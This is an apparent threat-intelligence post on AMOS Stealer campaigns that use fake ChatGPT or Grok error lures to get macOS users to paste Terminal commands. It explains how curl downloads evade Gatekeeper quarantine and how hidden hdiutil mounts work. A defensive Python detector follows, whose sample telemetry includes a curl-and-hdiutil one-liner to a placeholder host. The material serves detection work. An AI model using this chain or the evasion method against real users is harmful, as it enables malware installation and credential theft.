Intel Feed Snapshot (2026-07-03)

Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack uses browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok) that prompt users to copy a command and run it themselves in the macOS Terminal. Because the user, not the browser, performs the download, browser download warnings never fire; and because curl and wget do not set the com.apple.quarantine extended attribute that browsers apply to saved files, Gatekeeper never evaluates the fetched DMG, which is then mounted without any visible prompt via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.

  • Campaign Overview: The ClickFix Pivot

    • Transition of ClickFix techniques from Windows to macOS environments to expand target reach.
    • Lures borrow the trust users place in AI platforms such as ChatGPT and Grok, so a fake error message branded with those names reads as plausible and the "fix" it offers is followed.
    • Strategic shift toward user-initiated execution to neutralize automated security blocks and browser warnings.
  • Attack Vector: Manual Command Execution

    • Lures simulate technical glitches, instructing users to paste specific strings into zsh/bash.
    • Execution chain: Browser Lure → Terminal Command → Remote Payload Download (curl/wget) → DMG Mount (hdiutil).
    • Use of hdiutil attach to mount the malicious image from the command line (its -nobrowse and -quiet options keep the mounted volume out of Finder and suppress output), sidestepping the Finder-driven open and the installer prompts a user would otherwise see.
  • Malware Profile: AMOS Stealer

    • Specifically engineered macOS infostealer designed for stealthy data harvesting.
    • Targeted exfiltration of browser-stored passwords, session cookies, and system metadata.
    • Active targeting of local cryptocurrency wallet files and sensitive authentication tokens.
  • Defensive Actions & Mitigation

    • Opera Browser implemented "Paste Protect" to disrupt the clipboard-to-terminal delivery pipeline.
    • Defensive monitoring should focus on curl or wget spawned directly by an interactive shell (Terminal → zsh/bash) and followed in the same session by an hdiutil attach of the downloaded path; package managers such as Homebrew produce the same pair of commands for cask installs, so process ancestry, not the command names alone, is the discriminator.
    • Requirement for enhanced user education regarding the extreme risk of executing untrusted Terminal commands.
  • Conclusion: Evolving Social Engineering

    • Highlights a trend of bypassing OS-level protections (Gatekeeper) through direct human manipulation.
    • Demonstrates the vulnerability of users who are comfortable with command-line interfaces.
    • Necessitates a shift toward behavioral monitoring of system utilities over static signature detection.
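The detection described under Defensive Actions, as an added example that is not code from the original feed or from any vendor named on this page: a Python script that runs the curl/wget → hdiutil attach correlation over a few constructed process-execution events. The event schema, the sensor field names, the example.invalid URLs and the sample command lines are all assumptions made for illustration; only the download-then-mount relationship and the Terminal → zsh/bash ancestry come from the text above. It flags the chain in two shapes, a single pasted shell -c one-liner that both downloads and mounts, and a download followed within a short window by a mount from the same interactive shell session, and it deliberately ignores the same command pair when it runs under a package manager, as Homebrew cask installs do.

```python
"""Flag the ClickFix-style "download with curl/wget, then mount with hdiutil" chain
in process-execution telemetry from an interactive macOS terminal session.

Added illustration: the event schema below is an assumption, not a real sensor format.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry (not captured from any real host): one JSON event per line.
# Assumed fields: ts (epoch seconds), tty (terminal session), proc (image name),
# ancestors (process names from the root down to the direct parent), cmdline (joined argv).
SAMPLE_EVENTS = """
{"ts": 1000, "tty": "ttys001", "proc": "zsh", "ancestors": ["launchd", "Terminal"], "cmdline": "zsh -c curl -s https://example.invalid/fix.dmg -o /tmp/fix.dmg && hdiutil attach -nobrowse -quiet /tmp/fix.dmg"}
{"ts": 1200, "tty": "ttys002", "proc": "curl", "ancestors": ["launchd", "Terminal", "zsh"], "cmdline": "curl -fsSL https://example.invalid/update.dmg -o /tmp/update.dmg"}
{"ts": 1204, "tty": "ttys002", "proc": "hdiutil", "ancestors": ["launchd", "Terminal", "zsh"], "cmdline": "hdiutil attach -nobrowse -quiet /tmp/update.dmg"}
{"ts": 1300, "tty": "ttys003", "proc": "curl", "ancestors": ["launchd", "Terminal", "zsh", "brew", "ruby"], "cmdline": "curl -fL https://example.invalid/cask.dmg -o /Users/me/Library/Caches/Homebrew/downloads/cask.dmg"}
{"ts": 1302, "tty": "ttys003", "proc": "hdiutil", "ancestors": ["launchd", "Terminal", "zsh", "brew", "ruby"], "cmdline": "hdiutil attach -plist -nobrowse -readonly /Users/me/Library/Caches/Homebrew/downloads/cask.dmg"}
{"ts": 1400, "tty": "ttys004", "proc": "hdiutil", "ancestors": ["launchd", "Terminal", "zsh"], "cmdline": "hdiutil attach /Users/me/Downloads/Editor.dmg"}
"""

INTERACTIVE_SHELLS = {"zsh", "bash", "sh"}
TERMINALS = {"Terminal", "iTerm2"}   # assumption: terminal app names as the sensor reports them
WINDOW_SECONDS = 120                  # how long after a download a mount still counts as linked

DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://\S+")
MOUNT = re.compile(r"\bhdiutil\s+(?:attach|mount)\b")
SEPARATOR = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")   # splits a compound shell line into commands
SHELL_C = re.compile(r"\s-c\s")                      # shell invoked with an inline script


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def from_interactive_shell(ev):
    """True when the direct parent is a shell that itself sits directly under a terminal app.
    A curl launched by brew/ruby (or an installer) fails this test even though the
    grandparents are the same terminal and shell."""
    anc = ev["ancestors"]
    return len(anc) >= 2 and anc[-1] in INTERACTIVE_SHELLS and anc[-2] in TERMINALS


def has_download_then_mount(cmdline):
    """True when one compound command line fetches a URL and later mounts an image."""
    seen_download = False
    for segment in SEPARATOR.split(cmdline):
        if DOWNLOADER.search(segment) and URL.search(segment):
            seen_download = True
        elif seen_download and MOUNT.search(segment):
            return True
    return False


def detect(events):
    """Return a list of alert dicts; each has tty, rule and evidence."""
    alerts = []
    by_tty = defaultdict(lambda: {"downloads": [], "mounts": []})
    for ev in events:
        cmd = ev["cmdline"]
        # Rule 1: a shell started with -c whose inline script carries the whole chain.
        if (ev["proc"] in INTERACTIVE_SHELLS and TERMINALS.intersection(ev["ancestors"])
                and SHELL_C.search(cmd) and has_download_then_mount(cmd)):
            alerts.append({"tty": ev["tty"], "rule": "one_liner", "evidence": cmd})
            continue
        if not from_interactive_shell(ev):
            continue   # package managers and installers are not the pasted-command pattern
        if DOWNLOADER.search(cmd) and URL.search(cmd):
            by_tty[ev["tty"]]["downloads"].append(ev)
        elif MOUNT.search(cmd):
            by_tty[ev["tty"]]["mounts"].append(ev)
    # Rule 2: a download followed by a mount from the same session inside the window.
    for tty, seen in by_tty.items():
        for mount in seen["mounts"]:
            for dl in seen["downloads"]:
                if 0 <= mount["ts"] - dl["ts"] <= WINDOW_SECONDS:
                    alerts.append({"tty": tty, "rule": "download_then_mount",
                                   "evidence": f'{dl["cmdline"]} -> {mount["cmdline"]}'})
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

Run against the constructed events, the script raises two alerts (the pasted one-liner on ttys001 and the two-step chain on ttys002) and stays quiet on the Homebrew-style session and on a user who simply mounts a DMG already in Downloads. In a real deployment the ancestry check is the part to tune: a lure that tells the victim to open a different terminal emulator, or telemetry that reports the shell's parent as a login session rather than the app, needs those names added to TERMINALS.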

Related posts

  1. techjacksolutions.com — SmartApeSG ClickFix Chain Delivers NetSupport RAT via Unidentified Dropper with Encoded C2 Traffic
  2. bleepingcomputer.com — Opera rolls out Paste Protect feature to fight ClickFix attacks
  3. News4Hackers — Opera Launches Paste Protect to Combat ClickFix Attacks
  4. Cybersecurity News — Opera Blocks Clipboard Attacks, Including ClickFix, With New Paste Protect Feature
  5. itpro.com — Opera browser thinks it has the solution to stopping ClickFix malware attacks
  6. Dark Reading — And the Winner in Dominant Malware Delivery? ClickFix